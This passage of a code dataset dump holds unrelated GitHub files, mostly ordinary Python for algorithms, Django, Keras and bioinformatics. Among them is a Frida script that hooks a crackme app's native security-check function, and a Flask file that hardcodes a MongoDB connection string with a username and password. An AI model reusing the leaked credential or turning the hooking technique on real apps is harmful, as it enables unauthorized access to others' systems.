int(input())\n for j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n else:\n d[s] += 1\n\nm = int(input())\nfor j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n elif d[s] == n-1:\n l.append(s)\n\nprint(len(l))\nfor v in l:\n print(v)\nprint(len(d))\nfor k in d:\n print(k)","repo_name":"newRational/Yandex-algorithms-1.0","sub_path":"3/I/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42572252483","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\n\n\ndef index(request):\n\n if request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to=\"/events/\")\n else:\n template = loader.get_template('home/index.html')\n context = {\n 'title': 'Welcome to Send Cloud BBQ Planner'\n }\n return HttpResponse(template.render(context, 
request))\n","repo_name":"pouyaist/BBQ_planner","sub_path":"bbq_planner/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4465650616","text":"from math import ceil\n\ndef calc_parking_costs(hours):\n return hours * 1.5;\n\ndef calc_parking_costs_detailed(hours):\n if hours <= 8:\n total = 0;\n\n if hours > 0: \n total += 2;\n hours -= 1;\n \n if hours > 0:\n total += 1.5;\n hours -= 1;\n\n if hours > 0:\n total += hours * 1;\n\n return total;\n else:\n # the parking time is \"a day or more\"\n return ceil(hours / 24) * 10;\n\ndef is_coin_or_note(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n\n return money in correct_values;\n\ndef calc_returned_coins_and_notes(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n correct_values.sort(reverse=True);\n\n returned_values = {};\n\n for correct_value in correct_values:\n while money >= correct_value:\n money -= correct_value;\n if not correct_value in returned_values.keys():\n returned_values[correct_value] = 1;\n else:\n returned_values[correct_value] += 1;\n\n return returned_values;\n\ndef output_returned_money(returned_values: dict):\n for money_value, amount in returned_values.items():\n print(\"Sie bekommen {}x {} EUR.\".format(amount, money_value));\n\n\nhours = ceil(float(input(\"Geparkte Stunden: \")));\n\ncurrent_cost = calc_parking_costs_detailed(hours);\n\nprint(\"Es werden {} Euro fällig\".format(current_cost));\n\ntotal_paid = 0;\ntotal_return = 0;\nwhile current_cost > total_paid:\n paid_money_input = input(\"Wieviel zahlen Sie ein: \");\n\n try:\n paid_money = float(paid_money_input);\n\n total_paid += paid_money;\n\n if current_cost > total_paid:\n print(\"Sie müssen noch {} EUR bezahlen.\".format(current_cost));\n else:\n total_return = total_paid - current_cost;\n break;\n except:\n print(\"Vorgang abgebrochen.\");\n total_return = total_paid;\n\nif total_return > 0:\n returned_values = calc_returned_coins_and_notes(total_return);\n output_returned_money(returned_values);\n\nprint(\"Vielen Dank und auf Wiedersehen\");\n","repo_name":"TnTGamesTV/python-lesson","sub_path":"lesson3/A3_3242157.py","file_name":"A3_3242157.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74140031720","text":"\nimport bisect\nimport os\nimport json\nimport glob\n\nPROBLEM_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nDATA_DIR = f'{PROBLEM_DIR}/data'\nRESULTS_DIR = f'{PROBLEM_DIR}/results'\n\ndef loadProblems(fn):\n ret = {}\n fp = open(fn, 'r')\n \n num_isoforms, delta = [int(s) for s in fp.readline().rstrip().split(' ')]\n isoforms = []\n for x in range(0, num_isoforms):\n isoforms.append(fp.readline().rstrip())\n \n num_reads = int(fp.readline())\n reads = []\n for x in range(0, num_reads):\n reads.append(fp.readline().rstrip())\n\n fp.close()\n\n ret['isoforms'] = isoforms\n ret['reads'] = reads\n ret['delta'] = delta\n\n return ret\n\ndef parseRanges(s):\n regions = s.split(',')\n ret = []\n for r in regions:\n s, e = r.split('-')\n ret.append((int(s), int(e)))\n return ret\n\ndef solveProblem(problem):\n #Load the problem dict (or list of problem dicts)\n isoforms = problem['isoforms']\n reads = problem['reads']\n delta = problem['delta']\n num_isoforms = len(isoforms)\n\n #initial answers are all -1 and 0\n first_match = [-1]*len(reads)\n num_match = [0]*len(reads)\n\n 
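# first_match[i] is the index of the first isoform that read i maps to (-1 if\n    # none); num_match[i] counts every isoform it maps to. Illustrative case (not\n    # from the original data): with delta=2, read '100-200,300-400' matches an\n    # isoform whose exon chain contains consecutive exons '99-201,298-401', since\n    # the read's first start may sit inside the first exon and every other\n    # compared boundary differs by at most delta.\n    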
#strategy: iterate through each isoform, compare to the read to mark as a match or not; first find goes into find bucket\n print('Preprocessing reads...')\n parsed_reads = [parseRanges(r) for r in reads]\n\n print('Isoform iterating...')\n for iso_num, isoform in enumerate(isoforms):\n print(f'\\tIsoform #{iso_num} / {num_isoforms}...')\n iso_ranges = parseRanges(isoform)\n #print(iso_ranges)\n for read_num, pr in enumerate(parsed_reads):\n #print(pr)\n #compare them here\n pr_start = pr[0]\n ind = bisect.bisect(iso_ranges, pr_start)\n \n initial_check = max(0, ind-1)\n maximal_check = min(len(iso_ranges), ind+1)\n \n initial_range = -1\n for si in range(initial_check, maximal_check):\n curr_range = iso_ranges[si]\n if (pr_start[0] >= curr_range[0]-delta and\n abs(pr_start[1] - curr_range[1]) <= delta):\n #this is the initial range\n initial_range = si\n break\n \n if initial_range != -1 and (initial_range+len(pr) <= len(iso_ranges)):\n #this is a candidate, check all the in-between regions\n mismatch = False\n for offset in range(1, len(pr)-1):\n pr_range = pr[offset]\n curr_range = iso_ranges[initial_range+offset]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n abs(pr_range[1] - curr_range[1]) <= delta):\n #still good\n pass\n else:\n mismatch = True\n break\n\n #TODO: finally check the tail region\n pr_range = pr[-1]\n curr_range = iso_ranges[initial_range+len(pr)-1]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n pr_range[1] <= curr_range[1]+delta):\n pass\n else:\n mismatch = True\n\n if not mismatch:\n num_match[read_num] += 1\n if first_match[read_num] == -1:\n first_match[read_num] = iso_num\n\n #exit()\n\n print('Getting results...')\n results = {\n 'first_match' : first_match,\n 'num_match' : num_match\n }\n return results\n \ndef writeResults(fn, all_results):\n fp = open(fn, 'w+')\n first_match = all_results['first_match']\n num_match = all_results['num_match']\n for i, fm in enumerate(first_match):\n fp.write(f'{fm} {num_match[i]}\\n')\n fp.close()\n\nif __name__ == '__main__':\n #there are usually multiple per problem\n all_filenames = sorted(glob.glob(f'{DATA_DIR}/*.txt'))\n starting_problem = 6\n ending_problem = 6\n\n if not os.path.exists(RESULTS_DIR):\n os.makedirs(RESULTS_DIR)\n\n #go through each ones\n for problem in range(starting_problem, ending_problem+1):\n #filenames below might need to change per problem\n print(f'Analyzing problem set #{problem}...')\n #fn = f'{DATA_DIR}/{problem}.txt'\n fn = all_filenames[problem]\n fno = f'{RESULTS_DIR}/{problem}.txt'\n\n #load the problems for this set\n problems = loadProblems(fn)\n\n #generate results for each one\n all_results = solveProblem(problems)\n\n #finally save the results\n writeResults(fno, all_results)\n","repo_name":"holtjma/bio_contest_2021","sub_path":"problem_3.6/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"12370855658","text":"from random import sample\n\nimport math\nimport requests\nfrom flask import jsonify\nfrom flask_restx import Resource, Namespace, fields\nfrom pymongo import MongoClient\n\n# define namespace\nns = Namespace('ucb', description='ucb operations')\n\n\n# MongoDB 연결 설정\nmongodb_uri = \"mongodb+srv://p4dsteam6:team6@cluster0.yvkcbg6.mongodb.net/\"\nclient = MongoClient(mongodb_uri)\ndb = client['mindmapDB']\ncollections = {\n 'marketer': db['marketer_ucb'],\n 'developer': db['developer_ucb'],\n 'designer': 
db['designer_ucb'],\n}\n\n\ndef get_db():\n client = MongoClient(mongodb_uri)\n db = client['mindmapDB']\n return db\n\n\ndef get_collection(user_type):\n if user_type in collections:\n db = get_db()\n return db[user_type+'_ucb']\n\n\ndef related_word(word, limit=100):\n try:\n word = word.lower()\n url = f'http://api.conceptnet.io/c/en/{word}?rel=/r/RelatedTo&limit={limit}'\n response = requests.get(url)\n response.raise_for_status() # Raises stored HTTPError, if one occurred.\n data = response.json()\n except (requests.HTTPError, ValueError) as err:\n print(f'An error occurred: {err}')\n return []\n else:\n related_words = []\n for item in data['edges']:\n if item['rel']['label'] == 'RelatedTo':\n related = item['start']['label'].lower() if item['start']['label'].lower() != word else item['end']['label'].lower()\n if related not in related_words:\n related_words.append(related)\n return related_words\n\n\ndef store_word_and_related_words(word, user_type, limit=100):\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n related_words = related_word(word, limit)\n for a_word in related_words:\n doc = collection.find_one({\"word\": a_word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n\ndef center_word(word, user_type, num_samples=10):\n store_word_and_related_words(word, user_type, limit=100)\n words = related_word(word, limit=100)\n return sample(words, num_samples)\n\n\ndef get_word_params(word, user_type):\n \"\"\"\n Get the parameters of a word for Thompson Sampling from the database.\n If the word does not exist in the database, initialize it with 1 success and 1 failure.\n \"\"\"\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n else:\n params = doc[\"params\"]\n return params\n\n\ndef update_word_params(word, user_type, success):\n \"\"\"\n Update the parameters of a word for Thompson Sampling in the database.\n If success is True, increment the successes of the word.\n If success is False, increment the failures of the word.\n \"\"\"\n collection = get_collection(user_type)\n params = get_word_params(word, user_type)\n if success:\n params[\"successes\"] += 1\n else:\n params[\"failures\"] += 1\n collection.update_one({\"word\": word}, {\"$set\": {\"params\": params}})\n\n\ndef process_feedback(recommended_words, user_type, selected_word):\n \"\"\"\n Process the feedback of a user.\n If the selected word is in the recommended words, consider it a success for that word.\n \"\"\"\n success = (selected_word in recommended_words)\n update_word_params(selected_word, user_type, success)\n\n\ndef get_ucb(total, success, num_samples, c):\n \"\"\"\n Calculate the Upper Confidence Bound (UCB)\n \"\"\"\n if success == 0:\n return float('inf')\n average = success / total\n ucb = average + math.sqrt((c * math.log(num_samples)) / success)\n return ucb\n\n\ndef recommend_words_ucb(user_type, c, num_recommendations=10):\n \"\"\"\n Recommend a list of words using Upper Confidence Bound (UCB)\n \"\"\"\n collection = get_collection(user_type)\n words = collection.find({})\n word_samples = []\n total_samples = 0\n for word_doc in 
words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n total_samples += params[\"successes\"] + params[\"failures\"]\n\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n ucb = get_ucb(params[\"successes\"] + params[\"failures\"], params[\"successes\"], total_samples, c)\n word_samples.append((word, ucb))\n\n word_samples.sort(key=lambda x: x[1], reverse=True)\n recommended_words = [word for word, ucb in word_samples[:num_recommendations]]\n return recommended_words\n\n\n@ns.route('/center//')\n@ns.doc({'parameters': [{'name': 'word', 'in': 'path', 'type': 'string', 'required': True},\n {'name': 'user_type', 'in': 'path', 'type': 'string', 'required': True}]})\nclass centerWord(Resource):\n def get(self, word, user_type):\n suggestions = center_word(word, user_type)\n return jsonify(suggestions)\n\n\nlist_item_model = ns.model('ListItem', {\n 'center_word': fields.String(required=True, description='Center word'),\n 'user_type': fields.String(required=True, description='User type')\n})\n\n\n@ns.route('/human/')\n@ns.doc({'parameters': [{'name': 'choice_word', 'in': 'path', 'type': 'string', 'required': True}]})\nclass humanFeedback(Resource):\n @ns.expect(list_item_model)\n def post(self, choice_word, c):\n recommended_words = recommend_words_ucb(ns.payload['user_type'], c, num_recommendations=10)\n process_feedback(recommended_words, ns.payload['user_type'], choice_word)\n return jsonify(recommended_words)","repo_name":"GSDSProject/project","sub_path":"home/views/word/similarWord_ucb.py","file_name":"similarWord_ucb.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"165873909","text":"import numpy as np\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Dense, Input\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as plt\nimport csv\nfrom keras import backend as K\nimport keras\nfrom keras.models import load_model\nimport tensorflow as tf\n# def getSample(path):\n\t# label = []\n\t# input = []\n\t# with open(path, 'r', encoding='utf-8') as data:\n\t\t# read = csv.reader(data)\n\t\t# first_skip=True\n\t\t# for line in read:\n\t\t\t# if first_skip:\n\t\t\t\t# first_skip=False\n\t\t\t\t# continue\n\t\t\t# #one_hot=np.zeros(output_size)\n\t\t\t# #one_hot[int(line[0])]=1\n\t\t\t\n\t\t\t# label.append(int(line[0]))\n\t\t\t# raw = []\n\t\t\t# for i in line[1:]:\n\t\t\t\t# num=float(i)\n\t\t\t\t# if num>0:\n\t\t\t\t\t# raw.append(num)\n\t\t\t\t# else:\n\t\t\t\t\t# raw.append(0)\n\t\t\t# raw=np.array(raw)\n\t\t\t# raw=raw/np.average(raw)\n\t\t\t# input.append(raw)\n\t# return np.array(input),np.array(label)\n\n# x,y = getSample(\"sample_14L_Amptitute_0529.csv\")\n# # x,y = getSample(\"sample_mid.csv\")\n# print(np.shape(x), np.shape(y))\n\n\noutput_size=5 #類別數\ninput_size = 8192 #輸入Feature大小\nClassSampleNum = 240 #每個類別的樣本數\nTestSetNum = 40\nf_min = 150\nf_max = 70000\nResolution = 140000 / 16384\ndef getSample(path):\n\tlabel = []\n\tinput = []\n\twith open(path, 'r', encoding='utf-8') as data:\n\t\tread = csv.reader(data)\n\t\tfirst_skip=True\n\t\tfor line in read:\n\t\t\tif first_skip:\n\t\t\t\tfirst_skip=False\n\t\t\t\tcontinue\n\t\t\t#one_hot=np.zeros(output_size)\n\t\t\t#one_hot[int(line[0])]=1\n\t\t\t\n\t\t\tlabel.append(int(line[0]))\n\t\t\traw = []\n\t\t\tfor i in line[1::]:\n\t\t\t\tnum=float(i)\n\t\t\t\tif 
num>0:\n\t\t\t\t\traw.append(num)\n\t\t\t\telse:\n\t\t\t\t\traw.append(0)\n\t\t\traw=np.array(raw)\n\t\t\traw=raw/np.average(raw)\n\t\t\tinput.append(raw)\n\treturn np.array(input),np.array(label)\n\nx,y = getSample(\"sample.csv\")\nstd_x = np.std(x)\nmean_x = np.mean(x)\nx = (x-mean_x)/std_x\nprint(x.shape)\nprint(y.shape) \n\ndef Reorganize(x):\n x = np.reshape(x, (len(x), 8192))\n x_mean_col = np.mean(x , axis = 0)\n print(x_mean_col)\n x_mean = np.mean(x_mean_col[int((150/Resolution))::])*0.4\n print(x_mean)\n f = -Resolution\n flag = 0\n freq = []\n Idx = []\n #Select region\n print(\"Select region\")\n for i in range(input_size):\n f += Resolution\n if f > f_min and x_mean_col[i] > x_mean:\n if flag == 0:\n flag = 1\n freq.append([f])\n Idx.append([i])\n if f > f_min and x_mean_col[i] < x_mean:\n if flag == 1:\n flag = 0\n freq[len(freq)-1].append(f)\n Idx[len(Idx)-1].append(i)\n \n #merge\n print(\"merge\")\n j=0\n freq = np.array(freq)\n Idx = np.array(Idx)\n for i in range(len(freq)):\n if i == 0:\n continue\n if freq[j+1][0] - freq[j][1] < 300:\n freq[j][1] = freq[j+1][0]\n Idx[j][1] = Idx[j+1][0]\n freq = np.delete(freq, j+1, 0)\n Idx = np.delete(Idx, j+1, 0)\n else:\n j += 1\n \n #Reorganize\n print(\"Reorganize\")\n new_x = []\n for i in range(output_size*ClassSampleNum):\n new_x.append([])\n for idx in Idx:\n new_x[i].extend(x[i][idx[0]:idx[1]])\n \n # plt.plot(new_x[0][0:2369])\n # plt.title(\"Feature Map\")\n # plt.xlabel(\"Feature point\")\n # plt.ylabel(\"Amplitude\")\n # plt.show()\n \n new_x = np.reshape(new_x,(len(new_x), len(new_x[0])))\n print(np.shape(new_x))\n print(\"Freq. region : \")\n print(freq)\n print(Idx)\n \n # x_label = np.reshape(freq,(len(freq)*2))\n # y_label = np.ones(len(x_label))\n # plt.plot(np.arange(8191)*(Resolution)+Resolution, x_mean_col)\n # plt.bar(x_label,10,100, color='r')\n # plt.plot([0,70000], [x_mean, x_mean])\n # plt.xlabel(\"Frequency\")\n # plt.ylabel(\"Amplitude\")\n # plt.legend([\"Signal\", \"Threshold\", \"Select_Region\"])\n # plt.show()\n return new_x, len(new_x[0])\n \n# x, input_size = Reorganize(x)\n\ndef Greedy(evaluate_result, Model_num, sample_num, G_index = None, Threshold = None):\n TP=0\n TN=0\n FP=0\n FN=0\n\n if Threshold == None:\n sort_lose = np.sort(evaluate_result)\n Threshold = sort_lose[Model_num][G_index]\n \n for i,lose_ in enumerate(evaluate_result[Model_num]):\n if lose_ > Threshold: ##樣本lose大於當前閥值,即判定為不合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n FP += 1\n else:##實際為不合格\n TP += 1\n else: ##樣本lose小於當前閥值,即判定為合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n TN += 1\n else: #實際為不合格\n FN += 1\n TPR = TP/(FN+TP)\n FPR = FP/(FP+TN)\n PRE = TP/(TP+FP)\n ACC = (TP+TN)/(TP+TN+FP+FN)\n \n return TPR, FPR, PRE, ACC, TP, TN, FP, FN\n\npred_Data_test = []\npred_Data_train = []\nfor i in range(output_size*ClassSampleNum):\n if (i%ClassSampleNum >= ClassSampleNum-TestSetNum):\n pred_Data_test.append([x[i]])\n else:\n pred_Data_train.append([x[i]])\npred_Data_test = np.array(pred_Data_test)\npred_Data_train = np.array(pred_Data_train)\nprint(np.shape(pred_Data_test))\n\n##讀取所有模型\nclass_model = []\nfor i in range(output_size):\n class_model.append(load_model('./AE_Model/model_'+repr(i)+'/model_'+repr(i)+'.h5'))\n # class_model.append(tf.keras.models.load_model(\"model_\"+repr(i)+\".h5\"))\n \n##跑lose\nevaluate_result_test = 
[]\nevaluate_result_train = []\nfor i in range(output_size):\n cc = []\n for j in range(output_size*TestSetNum):\n cc.append(class_model[i].evaluate(pred_Data_test[j],pred_Data_test[j])) ## test set\n evaluate_result_test.append(cc)\n \n cc = []\n for j in range((ClassSampleNum-TestSetNum)*output_size):\n cc.append(class_model[i].evaluate(pred_Data_train[j],pred_Data_train[j])) ## train set\n evaluate_result_train.append(cc)\nprint(\"loss :\", evaluate_result_train[0][0])","repo_name":"hello5949/PhoneLock","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39751273523","text":"import glob\nimport numpy as np\nimport os\nimport tqdm\n\n# Import params\nfrom params import *\n\n#############################################################\n# LOAD IMAGE DIRS AND WORD NUMBERS\n#############################################################\n\ndef load_image_dirs_and_word_numbers(trainValSpeakersList = [1, 2, 3, 4, 5, 6, 7, 9],\n valSplit = 0.1,\n siList = [10, 11]):\n # TRAIN AND VAL\n trainDirs = []\n trainWordNumbers = []\n valDirs = []\n valWordNumbers = []\n np.random.seed(29)\n\n # For each speaker\n for speaker in sorted(tqdm.tqdm(trainValSpeakersList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n # List of all videos for each speaker\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n totalNumOfImages = len(vidDirs)\n # To shuffle directories before splitting into train and validate\n fullListIdx = list(range(totalNumOfImages))\n np.random.shuffle(fullListIdx)\n # Append training directories\n for i in fullListIdx[:int((1 - valSplit) * totalNumOfImages)]:\n for j in range(wordsPerVideo):\n trainDirs.append(vidDirs[i])\n trainWordNumbers.append(j)\n # Append val directories\n for i in fullListIdx[int((1 - valSplit) * totalNumOfImages):]:\n for j in range(wordsPerVideo):\n valDirs.append(vidDirs[i])\n valWordNumbers.append(j)\n\n # Numbers\n print(\"No. of training words: \" + str(len(trainDirs)))\n print(\"No. of val words: \" + str(len(valDirs)))\n\n # SPEAKER INDEPENDENT\n siDirs = []\n siWordNumbers = []\n for speaker in sorted(tqdm.tqdm(siList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n for i in fullListIdx:\n for j in range(wordsPerVideo):\n siDirs.append(vidDirs[i])\n siWordNumbers.append(j)\n\n # Numbers\n print(\"No. of speaker-independent words: \" + str(len(siDirs)))\n\n # Return\n return trainDirs, trainWordNumbers, valDirs, valWordNumbers, siDirs, siWordNumbers\n","repo_name":"voletiv/GRIDcorpus-experiments","sub_path":"gen-images-and-words/load_image_dirs_and_word_numbers.py","file_name":"load_image_dirs_and_word_numbers.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"2637201026","text":"#나무 자르기 (실버2) 231217 ✳ 4628ms ... 
시간 너무 오래 걸림\ndef solution() :\n import sys\n input = sys.stdin.readline\n\n n, m = map(int, input().split()) #나무의 수, 상근이가 가질 나무의 길이\n tree_list = list(map(int, input().split())) #나무의 높이\n\n start = 0\n end = max(tree_list) #가장 긴 나무 높이\n\n while start <= end :\n mid = (start+end) // 2\n total = 0\n\n for tree in tree_list :\n #나무 높이가 절단기 높이보다 큰 경우\n if tree > mid :\n total += (tree - mid) #나무 자름\n\n #자른 나무들의 길이가 m 이상인 경우\n if total >= m :\n start = mid + 1\n #m보다 작은 경우\n else :\n end = mid - 1\n\n print(end)","repo_name":"eun417/replit_test","sub_path":"algorithm/BinarySearch/BAEKJOON/bj_31.py","file_name":"bj_31.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13553495330","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views import View\n\nfrom baseapp.models.grafico import Grafico\n\n\nclass ListaGerarAjaxView(View):\n '''\n Adiciona um pedido via AJAX.\n :URl: http://ip_servidor/pedido/cadastrar/\n '''\n\n def get(self, request, **kwargs):\n '''\n :param request:\n :param id:\n :param kwargs: id do produto\n :return: HTML do modal\n '''\n context = {}\n data = {}\n data['form_is_valid'] = True\n data['id'] = self.kwargs.get('pk')\n data['titulo'] = 'chamados'\n data['tipo'] = 'bar'\n lista = get_object_or_404(Grafico, pk=self.kwargs.get('pk'))\n\n consulta = my_custom_sql(lista.sql)\n print(consulta)\n data['titulo'] = lista.nome\n lista = []\n for item in consulta:\n lista.append(item[0])\n data['lista'] = lista\n data['valor'] = lista\n\n return JsonResponse(data)\n\n\ndef my_custom_sql(consulta):\n from django.db import connection\n cursor = connection.cursor()\n cursor.execute(consulta)\n row = cursor.fetchall()\n return row\n","repo_name":"thiagolcdeoliveira/matrix","sub_path":"baseapp/views/ListaGerarAjax.py","file_name":"ListaGerarAjax.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29691098542","text":"import sys\n\nimport frida\n\n\ndef on_message(message, data):\n if message['type'] == 'send':\n\n print(\" {0}\".format(message['payload']))\n else:\n print(message)\n\n\nthread_backtracer = \"\"\"\n//打印lib线程调用的堆栈,显示堆栈地址成功,map名字失败\nJava.perform(function(){\n\n var f = Module.findExportByName('libcrackme.so', 'Java_com_yaotong_crackme_MainActivity_securityCheck');\n \n Interceptor.attach(f, {\n onEnter: function(args){\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE))\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromaddress))\n }\n })\n \n\n\n\n});\n\n\n\"\"\"\n\nif __name__ == '__main__':\n process = frida.get_device_manager().enumerate_devices()[-1].attach(\n \"com.yaotong.crackme\")\n script = process.create_script(thread_backtracer)\n script.on('message', on_message)\n script.load()\n sys.stdin.read()\n","repo_name":"kylezb/useful","sub_path":"examples/useful_python/examples/frida_hook/frida_studuy.py","file_name":"frida_studuy.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37615916628","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport urllib\nimport urlparse\nimport logging\nimport re\n\nfrom google.appengine.runtime.apiproxy_errors import CapabilityDisabledError\nfrom google.appengine.api import users\nfrom 
google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n\nimport webapp2\n\nimport devpanel\nimport bulk_update.handler\nimport request_cache\nfrom gae_mini_profiler import profiler\nfrom gae_bingo.middleware import GAEBingoWSGIMiddleware\nimport autocomplete\nimport coaches\nimport knowledgemap\nimport consts\nimport youtube_sync\nimport warmup\nimport library\nimport homepage\nimport nl\nimport nl_report\n\nimport search\n\nimport request_handler\nfrom app import App\nimport util\nimport user_util\nimport exercise_statistics\nimport activity_summary\nimport exercises\nimport dashboard\nimport exercisestats.report\nimport exercisestats.report_json\nimport github\nimport paypal\nimport smarthistory\nimport goals.handlers\n\nimport models\nfrom models import UserData, Video, Playlist, VideoPlaylist, ExerciseVideo, UserVideo, VideoLog\nfrom discussion import comments, notification, qa, voting\nfrom about import blog, util_about\nfrom phantom_users import util_notify\nfrom badges import util_badges, custom_badges\nfrom mailing_lists import util_mailing_lists\nfrom profiles import util_profile\nfrom custom_exceptions import MissingVideoException\nfrom templatetags import user_points\nfrom oauth_provider import apps as oauth_apps\nfrom phantom_users.phantom_util import create_phantom, get_phantom_user_id_from_cookies\nfrom phantom_users.cloner import Clone\nfrom counters import user_counter\nfrom notifications import UserNotifier\nfrom nicknames import get_nickname_for\nfrom image_cache import ImageCache\nfrom api.auth.xsrf import ensure_xsrf_cookie\nimport redirects\nimport robots\nfrom gae_bingo.gae_bingo import bingo\n\nclass VideoDataTest(request_handler.RequestHandler):\n\n @user_util.developer_only\n def get(self):\n self.response.out.write('')\n videos = Video.all()\n for video in videos:\n self.response.out.write('

    Title: ' + video.title)\n\n\nclass DeleteVideoPlaylists(request_handler.RequestHandler):\n# Deletes at most 200 Video-Playlist associations that are no longer live. Should be run every-now-and-then to make sure the table doesn't get too big\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(200)\n video_playlists_to_delete = []\n for video_playlist in all_video_playlists:\n if video_playlist.live_association != True:\n video_playlists_to_delete.append(video_playlist)\n db.delete(video_playlists_to_delete)\n\n\nclass KillLiveAssociations(request_handler.RequestHandler):\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(100000)\n for video_playlist in all_video_playlists:\n video_playlist.live_association = False\n db.put(all_video_playlists)\n\ndef get_mangled_playlist_name(playlist_name):\n for char in \" :()\":\n playlist_name = playlist_name.replace(char, \"\")\n return playlist_name\n\nclass ViewVideo(request_handler.RequestHandler):\n\n @ensure_xsrf_cookie\n def get(self, readable_id=\"\"):\n\n # This method displays a video in the context of a particular playlist.\n # To do that we first need to find the appropriate playlist. If we aren't\n # given the playlist title in a query param, we need to find a playlist that\n # the video is a part of. That requires finding the video, given it readable_id\n # or, to support old URLs, it's youtube_id.\n video = None\n playlist = None\n video_id = self.request.get('v')\n playlist_title = self.request_string('playlist', default=\"\") or self.request_string('p', default=\"\")\n\n readable_id = urllib.unquote(readable_id)\n readable_id = re.sub('-+$', '', readable_id) # remove any trailing dashes (see issue 1140)\n\n # If either the readable_id or playlist title is missing,\n # redirect to the canonical URL that contains them\n redirect_to_canonical_url = False\n if video_id: # Support for old links\n query = Video.all()\n query.filter('youtube_id =', video_id)\n video = query.get()\n\n if not video:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n readable_id = video.readable_id\n playlist = video.first_playlist()\n\n if not playlist:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n redirect_to_canonical_url = True\n\n if playlist_title is not None and len(playlist_title) > 0:\n query = Playlist.all().filter('title =', playlist_title)\n key_id = 0\n for p in query:\n if p.key().id() > key_id and not p.youtube_id.endswith('_player'):\n playlist = p\n key_id = p.key().id()\n\n # If a playlist_title wasn't specified or the specified playlist wasn't found\n # use the first playlist for the requested video.\n if playlist is None:\n # Get video by readable_id just to get the first playlist for the video\n video = Video.get_for_readable_id(readable_id)\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n playlist = video.first_playlist()\n if not playlist:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n redirect_to_canonical_url = True\n\n exid = self.request_string('exid', default=None)\n\n if redirect_to_canonical_url:\n qs = {'playlist': playlist.title}\n if exid:\n qs['exid'] = exid\n\n urlpath = \"/video/%s\" % urllib.quote(readable_id)\n url = urlparse.urlunparse(('', '', urlpath, '', urllib.urlencode(qs), ''))\n self.redirect(url, True)\n return\n\n # If we got here, we have a readable_id and a 
